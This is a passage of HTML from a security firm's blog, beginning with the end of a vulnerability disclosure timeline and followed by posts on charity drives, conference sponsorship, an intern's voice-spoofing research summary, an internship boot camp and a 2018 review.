<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Disclosure Timeline:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">25-03-2019 – Initial Discovery</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">27-03-2019 – Vendor Notification</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">29-08-2019 – Vendor Patch</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 12pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">30-08-2019 – Public Disclosure</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Credit:</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;"><br /></span></b></div>
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 3.75pt; text-align: justify;">
<span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">This vulnerability was discovered by Athanasios Tserpelis of Telspace Systems</span><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-89408749200413641892019-06-12T10:59:00.000+02:002019-06-12T10:59:11.111+02:00Giving back - Child Survivors of Crime (C.S.O.C)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbUbQ1sD50ptVIWhlRpQpg19QjwI5ajN8Snmg-Bpwm5Skua_Ui0I_4DqRcGTG6bBaPl7XIjkGqnJUmurJIxaG4KMXYxa-zyBPMEnqLXFy055DKGvHDz2qoYL3ixfZvV01tNM4wImIjjppN/s1600/Itweb+2019.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="432" data-original-width="605" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbUbQ1sD50ptVIWhlRpQpg19QjwI5ajN8Snmg-Bpwm5Skua_Ui0I_4DqRcGTG6bBaPl7XIjkGqnJUmurJIxaG4KMXYxa-zyBPMEnqLXFy055DKGvHDz2qoYL3ixfZvV01tNM4wImIjjppN/s400/Itweb+2019.png" width="400" /></a></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 15.693333625793457px; margin: 0in 0in 8pt;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 15.693333625793457px; margin: 0in 0in 8pt;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: 15.693333625793457px; margin: 0in 0in 8pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><span style="font-size: 11pt;">Last month (May 2019) Telspace was once again a sponsor at the ITWeb Security Summit 2019, for more information on the ITWeb Security Summit refer to:</span><span style="font-size: 11pt;"> </span><a href="http://v2.itweb.co.za/event/itweb/security-summit-2019/" style="color: #954f72; font-size: 11pt;">http://v2.itweb.co.za/event/itweb/security-summit-2019/</a></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: 11pt;">In addition to sponsoring this local conference, Telspace proudly ran a charity initiative on the days of the summit whereby we gave out original Telspace branded t-shirts to delegates (with a twist). </span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;">Every year we donate an amount to a charity for each t-shirt we give out, this year that amount was R40.00 per shirt. However, we also decided to try and give back more to the chosen charity and had a donation box at the stand. If a delegate wanted a t-shirt, a small donation (of any value) was requested in return for the t-shirt. Amazingly, thanks to the generous delegates at the summit, the donations box raised R3 296.10 over the 2 days. We thank you all for your generous contributions to this amazing initiative.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;">The chosen charity for this year was Child Survivors of Crime (C.S.O.C). This wonderful charity creates a rainbow after the storm for children affected by crime. Support is individually tailored to the specific needs of each child because each one’s circumstances are unique. They offer this support via psychological, material, educational, peer and general assistance. Should you like more information on this charity and / or to assist in contributing in some way, please do not hesitate to view their website and get in touch by going to: <a href="http://childsurvivors.org.za/" style="color: #954f72;">http://childsurvivors.org.za/</a>. This goes in line with one of our Junior Analyst's research topic for 2019 (Hi Delicia!).<o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;">In addition to the generous R3 296.10 raised, Telspace will be donating an additional R 8 000.00 (200 shirts x R40), making a total of R11 296.10 that will be donated to this amazing charity and initiative! We would like to say a huge thank you to all of the delegates that donated and participated in this initiative as well as our staff for getting involved! <o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;">It should be noted that the t-shirts contain a hidden challenge, if you received a t-shirt, find the challenge, solve it and play along to see where it may take you! <o:p></o:p></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif;">We would like to take this opportunity to once again say thank you to our staff, everyone that visited our stand and to everyone that showed support for Telspace Systems and in particular C.S.O.C. THANK YOU!</span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-67331265934190213682019-05-16T09:46:00.000+02:002019-05-16T09:46:35.103+02:00BSidesTLV - Proud Supporters<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu6-ED1_AOaeWuvQLEgrz-WblzZT4B6PrOaQ3NctoLrHHFZscxViQBrjzcZUCBoibJ1e78o-TrqnULHfCBhhKTppy8l4XhHpefU8AmWATDVEfpn3Nktd20_TVLh4bgfWkxhSs-igKENMMd/s1600/websidtebanner2-2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="792" data-original-width="1600" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu6-ED1_AOaeWuvQLEgrz-WblzZT4B6PrOaQ3NctoLrHHFZscxViQBrjzcZUCBoibJ1e78o-TrqnULHfCBhhKTppy8l4XhHpefU8AmWATDVEfpn3Nktd20_TVLh4bgfWkxhSs-igKENMMd/s400/websidtebanner2-2.jpg" width="400" /></a></div>
<br />
<br />
<br />
<span style="font-family: "trebuchet ms" , sans-serif;">This year, Telspace Systems had a goal of giving back as much as we could to the information security community. This ranged from internships, research, free workshops, community based sponsorships and free training.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">In line with this, we're very proud to announce that we'll be sponsoring BSides Tel Aviv 2019 (<a href="https://bsidestlv.com/">https://bsidestlv.com/</a>), which will be hosted at Tel Aviv University, Israel. We are very proud of the local community in Israel, and are happy to be supporting our friends and colleagues through our sponsorship of the conference as well as providing our Ethical Hacking 101 training course.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">It also gives us great pride and joy to announce that we will be giving back 100% of the proceeds of our workshop to the local BSides TLV community, which is in line with our 2019 goals. We hope to see more companies doing this in order to grow the information security space worldwide and give back as much as possible to our amazing industry.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">For more information about our training that we will be offering in Tel Aviv, click here:</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;"><a href="https://bsidestlv.com/workshops/ethical-hacking-101/">https://bsidestlv.com/workshops/ethical-hacking-101/</a> . </span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">Registration for BSides TLV can completed at <a href="https://bsidestlv.com/register-2019/">https://bsidestlv.com/register-2019/</a> .</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">We hope to see you there!</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-21701292778257137132019-05-01T17:41:00.001+02:002022-07-13T07:09:39.283+02:00Put Words In My Mouth<div class="separator" style="clear: both; text-align: center;"><br /></div>
<br />
<div style="text-align: center;">
<b><span face=""trebuchet ms" , sans-serif">Put Words In My Mouth | Telspace Systems Intern Research</span></b><br />
<b><span face=""trebuchet ms" , sans-serif">By Amy Manià</span></b></div>
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">Money has been withdrawn from your account.</span><br />
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">You don’t remember making, or authorising that transaction.</span><br />
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">When you follow up with the bank, they say you called earlier and requested the transfer – it was, after-all, you speaking – right? Unbeknownst to you, your voice was stolen, and so was your money.</span><br />
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">With the rise of voice authentication biometrics, so too will the opportunities to spoof it. Text-to-Speech APIs are constantly improving, for example, Google’s technology is able to create voices that are indistinguishable from recordings made by the real-life human speaker.</span><br />
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">Threat actors have access to a target’s voice recordings through passive channels such as YouTube videos, social media posts etc. More active / invasive channels an attacker could use would be to compromise vulnerable IoT devices which are becoming more common place throughout homes and offices. Social media posts and IoT devices would allow threat actors to listen to a voice, capture and then manipulate it (all using free online tools).</span><br />
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">So what exactly can be done with a ‘stolen’ voice? </span><span face=""trebuchet ms" , sans-serif">This research explores the vulnerabilities in IoT devices, the legal landscape surrounding these devices and the various voice cloning, authentication and recognition software currently available. The report culminates by examining the possibilities of banking fraud, by using voice-spoofing to bypass authentication and transfer funds. The report includes a demonstration of the simulated attack on a bank.</span><br />
<span face=""trebuchet ms" , sans-serif"><br /></span>
<span face=""trebuchet ms" , sans-serif">Download the full Telspace Systems research paper here which was written by Amy: </span><br />
<a href="https://github.com/telspacesystems/intern-research/blob/master/A%20MANIA%20-PUT%20WORDS%20IN%20MY%20MOUTH%20-%20FINAL(Voice%20Spoofing).pdf" style="font-family: "trebuchet ms", sans-serif;">https://github.com/telspacesystems/intern-research/blob/master/A%20MANIA%20-PUT%20WORDS%20IN%20MY%20MOUTH%20-%20FINAL(Voice%20Spoofing).pdf</a><br />
<span face=""trebuchet ms" , sans-serif"></span>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-75551719717459736492019-03-05T11:00:00.000+02:002019-03-05T11:25:35.863+02:00Telspace Systems Internship/Boot camp, March 2019<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">We are excited and proud to announce that our boot camp / internship kicked off yesterday! <u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjReJFZSwHGwFK-z-avtgc3U7hog0gE-u1U8j_-yKHDiEgWjmm_QI8Zh1doi7FqmBmDeZD2hBhSSICDQlFiutLmVJ3D9hmfztrIsGoJXICTYl7CGgca0xgqX9Dzcije3jTtJsgDe0naIJSO/s1600/IMG_20190304_143323.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1200" data-original-width="1600" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjReJFZSwHGwFK-z-avtgc3U7hog0gE-u1U8j_-yKHDiEgWjmm_QI8Zh1doi7FqmBmDeZD2hBhSSICDQlFiutLmVJ3D9hmfztrIsGoJXICTYl7CGgca0xgqX9Dzcije3jTtJsgDe0naIJSO/s320/IMG_20190304_143323.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">After approximately 100 thorough interviews, which covered a number of areas, we have secured 10 new interns. The areas we covered during the interview stage, to name a few were: <u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<br /></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">Networking, Linux, Windows, Software Development and Exploitation, Cryptography and general information security knowledge. <u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<br /></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">From a statistics perspective, the weakest area identified was cryptography (a future post on interview statistics is planned!)<u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<br /></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">We believe our internship / boot camp surpasses the industry “norm” due to the following reasons:<u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<br /></div>
<br />
<ul style="font-size: 14px; margin-top: 0in;" type="disc">
<li class="MsoNormal"><span style="font-family: "trebuchet ms" , sans-serif;">Our internships don’t have any monetary restraint attached to them and interns will be paid a monthly salary whilst they are undertaking the training with us, also, there are no restraints where the interns will have to pay back money if they don’t work for Telspace for a period of time. Doing anything else but this would only benefit the company itself, rather than the community. </span></li>
</ul>
<ul style="font-size: 14px; margin-top: 0in;" type="disc">
<li class="MsoNormal"><span style="font-family: "trebuchet ms" , sans-serif;">If interns don’t feel they are a match at Telspace Systems during the boot camp, they are free to go, taking with them the knowledge that we passed on to them as well as any certifications (and we are more than happy with that!).</span></li>
</ul>
<ul style="font-size: 14px; margin-top: 0in;" type="disc">
<li class="MsoNormal"><span style="font-family: "trebuchet ms" , sans-serif;">Should our interns pass the assessment criteria at the end of the boot camp, via different assessment gateways (including a research gateway), they will be offered a full-time junior analyst position at Telspace Systems (which they don’t have to take!), with this offer there will be additional training / certifications provided.</span></li>
</ul>
<ul style="font-size: 14px; margin-top: 0in;" type="disc">
<li class="MsoNormal"><span style="font-family: "trebuchet ms" , sans-serif;">This boot camp is about growing the community, and thereafter, our company in order to service our customers better in the future. </span><span style="font-family: "trebuchet ms" , sans-serif;"> </span></li>
</ul>
<br />
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">We will be hosting a few more boot camp throughout the year, so keep your eyes peeled if you are interested in taking part in one!<u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<br /></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">Good luck to all our new interns, we hope to see many shells and calcs being popped</span><span style="font-family: "calibri" , sans-serif;">!<u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "calibri" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "calibri" , sans-serif;"><br /></span></div>
<br class="Apple-interchange-newline" />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-81361603410927346452019-01-09T14:23:00.001+02:002022-12-12T22:36:57.610+02:00Looking back on 2018 and forward to great things in 2019!<h1 style="color: black; font-style: normal; letter-spacing: normal; line-height: 21.4667px; margin: 12pt 0in 6pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<style type="text/css">
@page { margin: 2cm }
p { margin-bottom: 0.25cm; direction: ltr; line-height: 120%; text-align: left; orphans: 2; widows: 2 }
a:link { color: #0000ff }
</style>
<div style="font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">As we enter a new
year Telspace would like to look back on 2018 and thank everyone who
made 2018 a great and exciting year. We have had the pleasure of
attending a number of conferences where we were able to present,
train and share ideas with like-minded individuals. This blog post
provides an overview of some of the highlights this year, if we have
missed anything let us know in the comments below!
</span></div>
<div style="font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">We kicked the
year off by hiring William Boshoff as our Chief Technical Officer
(CTO), this was and still is part of our constant drive to
continuously innovate and improve our services to clients. William
believes that cultivating a culture of continual growth, learning and
development directly translates into greater value for Telspace’s
clients.</span></div>
<div style="font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">William’s
experience ranges from assessing and consulting in high security
environments, mostly in the finance and government sectors, through
to lecturing and contributing as a subject matter expert on multiple
boards.</span></div>
<div style="font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-size: large;"><span style="font-family: inherit;">In his spare
time, William enjoys contributing to the information security
community by sharing his research, mentoring and developing zero-day
exploits. </span><span style="font-family: "liberation sans" , serif;"> </span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-family: "liberation sans", serif; font-size: 14pt; font-weight: normal; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXJ_KvxsKb0brWeSlY1JwQzwcktIinFhyoL7fZKoyvW6fksrYUvjYK2MNSflyaNzv4h_i2gY1AXQ1vI5UHGRvRS4upOIArRCChIayz1rCDtBYjjwg3PayTZz5yG6QSfsvdSZj0L1wjkCGH/s1600/William.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="459" data-original-width="816" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXJ_KvxsKb0brWeSlY1JwQzwcktIinFhyoL7fZKoyvW6fksrYUvjYK2MNSflyaNzv4h_i2gY1AXQ1vI5UHGRvRS4upOIArRCChIayz1rCDtBYjjwg3PayTZz5yG6QSfsvdSZj0L1wjkCGH/s1600/William.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">William Boshoff (Telsace Systems CTO)</span></td></tr>
</tbody></table>
<div style="font-family: "liberation sans", serif; font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<br /></div>
<div style="font-family: "liberation sans", serif; font-size: 14pt; font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<style type="text/css">
@page { margin: 2cm }
p { margin-bottom: 0.25cm; direction: ltr; line-height: 120%; text-align: left; orphans: 2; widows: 2 }
a:link { color: #0000ff }
</style>
</div>
<div style="break-before: page; line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;"><span style="font-weight: normal;">Telspace has also smashed international borders and expanded
internationally to the UK, Egypt and Palestine! If you are
interested and </span>PASSIONATE<span style="font-weight: normal;">, we are hiring!</span></span></div>
<div class="separator" style="clear: both; font-family: "liberation sans", serif; font-size: 14pt; font-weight: normal; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL1JR0rGd_BSZW1j23DtItDYrTW9lVMJDAJBvolZ71rdqXzdFYvF4nVMLn-K8YHIBOuU8c120kIpma7Mj-tmUO0CHY-pL5taVPpXTtVRtzBgRoBT6MThDHP9xnqs5zfAnmsUZWf46suzTw/s1600/GlobalTS.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="568" data-original-width="1125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL1JR0rGd_BSZW1j23DtItDYrTW9lVMJDAJBvolZ71rdqXzdFYvF4nVMLn-K8YHIBOuU8c120kIpma7Mj-tmUO0CHY-pL5taVPpXTtVRtzBgRoBT6MThDHP9xnqs5zfAnmsUZWf46suzTw/s1600/GlobalTS.png" /></a></div>
<div style="font-family: "liberation sans", serif; font-size: 14pt; font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<br /></div>
</h1>
<h2 style="line-height: 115%; margin-bottom: 0.35cm;">
Local is Lekker</h2>
<div>
<div>
<span style="font-size: large;"><span style="font-family: inherit;">Telspace has always been very close to the local (South African) infosec community and we believe in giving back. In line with this Telspace sponsored BSides Cape Town 2018, where we were proud to run a “selfies for charity” fundraiser for the South African Depression and Anxiety Group (@TheSADAG).</span> </span></div>
<div>
<span style="font-size: large;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYpC9Cy8zBS9zk2SSN53mszReUdRcnxnXxr311ZRpzm4H1h3LTnQ8DrkwJkkObu0wp3mLMmhSQwKptcJu2ZtJvgWwFaQ_miqTE4KBP0DzXuV_WLhyphenhyphenJMhhEVSENpIofkfuUK270tGrm8kxB/s1600/crew.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="955" data-original-width="789" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYpC9Cy8zBS9zk2SSN53mszReUdRcnxnXxr311ZRpzm4H1h3LTnQ8DrkwJkkObu0wp3mLMmhSQwKptcJu2ZtJvgWwFaQ_miqTE4KBP0DzXuV_WLhyphenhyphenJMhhEVSENpIofkfuUK270tGrm8kxB/s1600/crew.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Telspace Crew at BSides Cape Town 2018 (left to right): Manny Corregedor, Derek Scott, Ayaz Saiyed</span></td></tr>
</tbody></table>
<div>
<span style="font-size: large;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmWh7INfdRyLuHn8UGCxikpQweG4aqHo6_fHKl9lztSleMd_45kOadMRUMMLCCHkxtN7nWKRot3oRBsovz3KQPmErTr-3Ljpk9IGCpSSxypwqFzMAC_izJix6Axm7jQ_7FlfZaIc92y5j3/s1600/SelfiesEffectsCartoon.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="775" data-original-width="1026" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmWh7INfdRyLuHn8UGCxikpQweG4aqHo6_fHKl9lztSleMd_45kOadMRUMMLCCHkxtN7nWKRot3oRBsovz3KQPmErTr-3Ljpk9IGCpSSxypwqFzMAC_izJix6Axm7jQ_7FlfZaIc92y5j3/s1600/SelfiesEffectsCartoon.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Some “selfies for charity” at BSides Cape Town 2018</span></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: inherit; font-size: large;">Telspace also spoke at ITWeb’s Security Summit 2018, gave training (Ethical Hacking 101) and exhibited. Our CEO, Dino Covotsos and COO, Manny Corregedor, were both part of the advisory board for 2018. The conference was well attended and had great international speakers such as Mikko Hyppönen, April Wright, Jayson Street and Rodrigo Branco who gave keynotes.</span></div>
<div>
<span style="font-family: inherit; font-size: large;"><br /></span></div>
<div>
<span style="font-family: inherit; font-size: large;">We also got the opportunity to catchup with the international speakers who are old / good friends of Telspace Systems employees and made a charitable donation to CANSA for every Telspace t-shirt that was given away to attendees that visited our stand. We also exhibited at the Department of Defence supplier day which was well attended.</span></div>
</div>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpLwQkLbt9PzzDFkSzGXGsOHFTW8GBDjE0g6lahU4C_W3Ck6GkENkvzhMdYIq5r4tLg2oUdjMeadh7xaBgHEaIfFooLN8i33um6bo-kJgL-qcXSC89Wl3jxE8lkdMiVIqTiQcGtkEeighF/s1600/IMG_20180523_104751.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="696" data-original-width="1238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpLwQkLbt9PzzDFkSzGXGsOHFTW8GBDjE0g6lahU4C_W3Ck6GkENkvzhMdYIq5r4tLg2oUdjMeadh7xaBgHEaIfFooLN8i33um6bo-kJgL-qcXSC89Wl3jxE8lkdMiVIqTiQcGtkEeighF/s1600/IMG_20180523_104751.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Left to right: Tarryn Hardman (Telspace Systems), Sibusiso Nxumalo (Former-Telspace Systems Employee), Rodrigo Branco (Intel), Manny Corregedor (Telspace Systems)</span></td></tr>
</tbody></table>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje9Xeyr3KH-pQXo5UTncmkDUW55BRj2nmYuH8axIZqloxKy5_Mq_3pc7ZYTsgeXMCCNNRg5Fg7PF4B1CNFOyIHLj2uDIDqZHezq6-qNzJxtcJm6B_NpqrQskORvLYp9nEwmcp86XvOwPQa/s1600/ITWeb-Mikko.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="1200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje9Xeyr3KH-pQXo5UTncmkDUW55BRj2nmYuH8axIZqloxKy5_Mq_3pc7ZYTsgeXMCCNNRg5Fg7PF4B1CNFOyIHLj2uDIDqZHezq6-qNzJxtcJm6B_NpqrQskORvLYp9nEwmcp86XvOwPQa/s1600/ITWeb-Mikko.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Left to right: Mikko Hyppönen (F-Secure), Dino Covotsos (Telspace Systems)</span></td></tr>
</tbody></table>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
